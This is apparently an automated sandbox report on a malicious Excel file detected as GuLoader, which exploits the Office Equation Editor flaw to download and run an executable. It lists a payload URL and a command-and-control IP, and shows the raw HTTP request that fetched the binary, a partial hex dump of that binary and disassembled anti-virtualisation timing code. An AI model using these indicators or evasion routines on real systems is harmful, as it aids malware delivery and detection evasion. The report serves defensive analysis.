Windows Analysis Report DB_aabbbkdjdhgdghjdkjdggdghh0x06E5.xlsx

Overview

General Information

Sample Name:	DB_aabbbkdjdhgdghjdkjdggdghh0x06E5.xlsx
Analysis ID:	457648
MD5:	ab57abd998267541ce6d27ecf2b85ba5
SHA1:	4840478268380cf80e55d5ca019d108236d100a6
SHA256:	6af62a337c410357a5f49294e98ead83092c6a1d3b73e58c2f56ea5abfdd745e
Tags:	VelvetSweatshopxlsx
Infos:
Most interesting Screenshot:

Detection

GuLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Sigma detected: Droppers Exploiting CVE-2017-11882

Sigma detected: EQNEDT32.EXE connecting to internet

Sigma detected: File Dropped By EQNEDT32EXE

Yara detected GuLoader

C2 URLs / IPs found in malware configuration

Contains functionality to detect hardware virtualization (CPUID execution measurement)

Detected RDTSC dummy instruction sequence (likely for instruction hammering)

Drops PE files to the user root directory

Office equation editor drops PE file

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Sigma detected: Execution from Suspicious Folder

Tries to detect virtualization through RDTSC time measurements

Abnormal high CPU Usage

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to call native functions

Contains functionality to read the PEB

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Downloads executable code via HTTP

Drops PE files

Drops PE files to the user directory

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Office Equation Editor has been started

PE file contains strange resources

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Signatures

AV Detection:

Found malware configuration

Source: 00000006.00000002.2355912032.0000000000270000.00000040.00000001.sdmp

Malware Configuration Extractor: GuLoader {"Payload URL": "https://kinmirai.org/wp-content/bin_NIapfDNXM183.bin"}

Multi AV Scanner detection for submitted file

Source: DB_aabbbkdjdhgdghjdkjdggdghh0x06E5.xlsx

ReversingLabs: Detection: 30%

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe			Jump to behavior

Office Equation Editor has been started

Source: unknown

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: C:\Program Files (x86)\Administrator-Cloud\Projects\bayrerss.pdb source: .svchost[1].exe.4.dr
Source:	Binary string: C:\Program Files (x86)\Administrator-Cloud\Projects\bayrerss.pdb source: .svchost[1].exe.4.dr

Software Vulnerabilities:

Potential document exploit detected (performs HTTP gets)

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 180.214.239.39:80

Potential document exploit detected (unknown TCP traffic)

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 180.214.239.39:80

Source: excel.exe

Memory has grown: Private usage: 4MB later: 68MB

Networking:

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: https://kinmirai.org/wp-content/bin_NIapfDNXM183.bin

Downloads executable code via HTTP

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 02 Aug 2021 05:13:25 GMTServer: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28Last-Modified: Sun, 01 Aug 2021 20:24:21 GMTETag: "3f478-5c8853ce1d903"Accept-Ranges: bytesContent-Length: 259192Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c7 bf 79 da 83 de 17 89 83 de 17 89 83 de 17 89 00 c2 19 89 82 de 17 89 cc fc 1e 89 87 de 17 89 b5 f8 1a 89 82 de 17 89 52 69 63 68 83 de 17 89 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 81 b0 7a 59 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 40 03 00 00 90 00 00 00 00 00 00 88 13 00 00 00 10 00 00 00 50 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 e0 03 00 00 10 00 00 65 52 04 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 24 46 03 00 28 00 00 00 00 60 03 00 f2 70 00 00 00 00 00 00 00 00 00 00 58 e0 03 00 20 14 00 00 00 00 00 00 00 00 00 00 00 11 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 f4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 64 3a 03 00 00 10 00 00 00 40 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 94 0b 00 00 00 50 03 00 00 10 00 00 00 50 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f2 70 00 00 00 60 03 00 00 80 00 00 00 60 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 c3 1f b0 49 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 180.214.239.39 180.214.239.39

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN

Uses a known web browser user agent for HTTP communication

Source: global traffic

HTTP traffic detected: GET /msexcel/.svchost.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 180.214.239.39Connection: Keep-Alive

Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3F47FD52.emf

Jump to behavior

Source: global traffic

Source: .svchost[1].exe.4.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: .svchost[1].exe.4.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: .svchost[1].exe.4.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: .svchost[1].exe.4.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: .svchost[1].exe.4.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: .svchost[1].exe.4.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: .svchost[1].exe.4.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: .svchost[1].exe.4.dr	String found in binary or memory: http://ocsp.digicert.com0O
Source: 3F47FD52.emf.0.dr	String found in binary or memory: http://www.day.com/dam/1.0
Source: .svchost[1].exe.4.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: .svchost[1].exe.4.dr	String found in binary or memory: https://www.digicert.com/CPS0

System Summary:

Office equation editor drops PE file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exe			Jump to dropped file

Abnormal high CPU Usage

Source: C:\Users\Public\vbc.exe

Process Stats: CPU usage > 98%

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Source: C:\Users\Public\vbc.exe	Memory allocated: 76E20000 page execute and read and write			Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76D20000 page execute and read and write			Jump to behavior

Contains functionality to call native functions

Source: C:\Users\Public\vbc.exe

Code function: 6_2_00275798 NtAllocateVirtualMemory,

6_2_00275798

Detected potential crypto function

Source: C:\Users\Public\vbc.exe	Code function: 6_2_00275798	6_2_00275798
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00274021	6_2_00274021
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00277C02	6_2_00277C02
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00277C0D	6_2_00277C0D
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00272877	6_2_00272877
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00274050	6_2_00274050
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0027245F	6_2_0027245F
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00279058	6_2_00279058
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0027489B	6_2_0027489B
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00274CF4	6_2_00274CF4
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002790D7	6_2_002790D7
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0027792B	6_2_0027792B
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0027352B	6_2_0027352B
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00273D14	6_2_00273D14
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0027796F	6_2_0027796F
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0027916F	6_2_0027916F
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0027554D	6_2_0027554D
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002739D7	6_2_002739D7
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00277A0B	6_2_00277A0B
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00272655	6_2_00272655
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00274AAA	6_2_00274AAA
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00279AB9	6_2_00279AB9
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002746B8	6_2_002746B8
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00274ADA	6_2_00274ADA
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00277B34	6_2_00277B34
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0027433C	6_2_0027433C
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00278F4F	6_2_00278F4F
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00278F5C	6_2_00278F5C
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00273BB6	6_2_00273BB6
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00271BF7	6_2_00271BF7
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00271BF9	6_2_00271BF9
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002783CF	6_2_002783CF
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002773CC	6_2_002773CC
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00278FD6	6_2_00278FD6
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00277BDB	6_2_00277BDB

PE file contains strange resources

Source: .svchost[1].exe.4.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: .svchost[1].exe.4.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: .svchost[1].exe.4.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.4.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.4.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.4.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: classification engine

Classification label: mal100.troj.expl.evad.winXLSX@4/19@0/1

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\~$DB_aabbbkdjdhgdghjdkjdggdghh0x06E5.xlsx

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRDDD0.tmp

Jump to behavior

Source: C:\Users\Public\vbc.exe

Section loaded: C:\Windows\SysWOW64\msvbvm60.dll

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\Public\vbc.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: DB_aabbbkdjdhgdghjdkjdggdghh0x06E5.xlsx

ReversingLabs: Detection: 30%

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: DB_aabbbkdjdhgdghjdkjdggdghh0x06E5.xlsx

Static file information: File size 1163264 > 1048576

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: C:\Program Files (x86)\Administrator-Cloud\Projects\bayrerss.pdb source: .svchost[1].exe.4.dr
Source:	Binary string: C:\Program Files (x86)\Administrator-Cloud\Projects\bayrerss.pdb source: .svchost[1].exe.4.dr

Data Obfuscation:

Yara detected GuLoader

Source: Yara match

File source: 00000006.00000002.2355912032.0000000000270000.00000040.00000001.sdmp, type: MEMORY

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\Public\vbc.exe	Code function: 6_2_00421041 push ss; retf	6_2_00421042
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00422433 push eax; iretd	6_2_004224A1
Source: C:\Users\Public\vbc.exe	Code function: 6_2_004200E2 push eax; iretd	6_2_004200E5
Source: C:\Users\Public\vbc.exe	Code function: 6_2_004210A8 push ebx; retf	6_2_004210AE
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00421D79 pushfd ; iretd	6_2_00421D97
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00405D8C push eax; retf	6_2_00405DC6
Source: C:\Users\Public\vbc.exe	Code function: 6_2_004223E5 push eax; iretd	6_2_004224A1
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0027540E pushad ; retf	6_2_00275419
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00272F61 push esi; ret	6_2_00272F63
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002783B8 push edx; ret	6_2_002783B9
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00278391 push edx; ret	6_2_00278392
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00270FFD push ebx; iretd	6_2_0027100C

Persistence and Installation Behavior:

Drops PE files

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exe			Jump to dropped file

Drops PE files to the user directory

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Boot Survival:

Drops PE files to the user root directory

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Contains functionality to detect hardware virtualization (CPUID execution measurement)

Source: C:\Users\Public\vbc.exe	Code function: 6_2_00275798 NtAllocateVirtualMemory,	6_2_00275798
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00274050	6_2_00274050
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0027245F	6_2_0027245F
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0027352B	6_2_0027352B
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0027433C	6_2_0027433C
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00273714	6_2_00273714
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00273BB6	6_2_00273BB6
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002773CC	6_2_002773CC

Detected RDTSC dummy instruction sequence (likely for instruction hammering)

Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 0000000000276EEA second address: 00000000002773F6 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a add eax, FF6DF465h 0x0000000f add eax, 051D0E23h 0x00000014 cmp ch, FFFFFF9Bh 0x00000017 add eax, BB406732h 0x0000001c push ss 0x0000001d pop ss 0x0000001e jmp 00007FD67CF2C9C3h 0x00000020 cmp dword ptr [ebp+0000024Eh], eax 0x00000026 mov eax, dword ptr [ebp+0000024Eh] 0x0000002c jne 00007FD67CF2CA68h 0x00000032 pushad 0x00000033 mov bl, 77h 0x00000035 cmp bl, 00000077h 0x00000038 jne 00007FD67CF2F022h 0x0000003e popad 0x0000003f push 7DDA0CB7h 0x00000044 call 00007FD67CF2CE1Ah 0x00000049 mov eax, dword ptr fs:[00000030h] 0x0000004f mov eax, dword ptr [eax+0Ch] 0x00000052 test cx, ax 0x00000055 mov eax, dword ptr [eax+14h] 0x00000058 mov ecx, dword ptr [eax] 0x0000005a pushad 0x0000005b mov bx, 12CFh 0x0000005f cmp bx, 12CFh 0x00000064 jne 00007FD67CF25C13h 0x0000006a popad 0x0000006b mov eax, ecx 0x0000006d cmp dh, ah 0x0000006f jmp 00007FD67CF2C9C6h 0x00000071 test bh, bh 0x00000073 mov ebx, dword ptr [eax+28h] 0x00000076 test bl, dl 0x00000078 mov dword ptr [ebp+00000238h], edx 0x0000007e pushad 0x0000007f lfence 0x00000082 rdtsc
Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 00000000002792DD second address: 00000000002792DD instructions:

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 0000000000276EEA second address: 00000000002773F6 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a add eax, FF6DF465h 0x0000000f add eax, 051D0E23h 0x00000014 cmp ch, FFFFFF9Bh 0x00000017 add eax, BB406732h 0x0000001c push ss 0x0000001d pop ss 0x0000001e jmp 00007FD67CF2C9C3h 0x00000020 cmp dword ptr [ebp+0000024Eh], eax 0x00000026 mov eax, dword ptr [ebp+0000024Eh] 0x0000002c jne 00007FD67CF2CA68h 0x00000032 pushad 0x00000033 mov bl, 77h 0x00000035 cmp bl, 00000077h 0x00000038 jne 00007FD67CF2F022h 0x0000003e popad 0x0000003f push 7DDA0CB7h 0x00000044 call 00007FD67CF2CE1Ah 0x00000049 mov eax, dword ptr fs:[00000030h] 0x0000004f mov eax, dword ptr [eax+0Ch] 0x00000052 test cx, ax 0x00000055 mov eax, dword ptr [eax+14h] 0x00000058 mov ecx, dword ptr [eax] 0x0000005a pushad 0x0000005b mov bx, 12CFh 0x0000005f cmp bx, 12CFh 0x00000064 jne 00007FD67CF25C13h 0x0000006a popad 0x0000006b mov eax, ecx 0x0000006d cmp dh, ah 0x0000006f jmp 00007FD67CF2C9C6h 0x00000071 test bh, bh 0x00000073 mov ebx, dword ptr [eax+28h] 0x00000076 test bl, dl 0x00000078 mov dword ptr [ebp+00000238h], edx 0x0000007e pushad 0x0000007f lfence 0x00000082 rdtsc
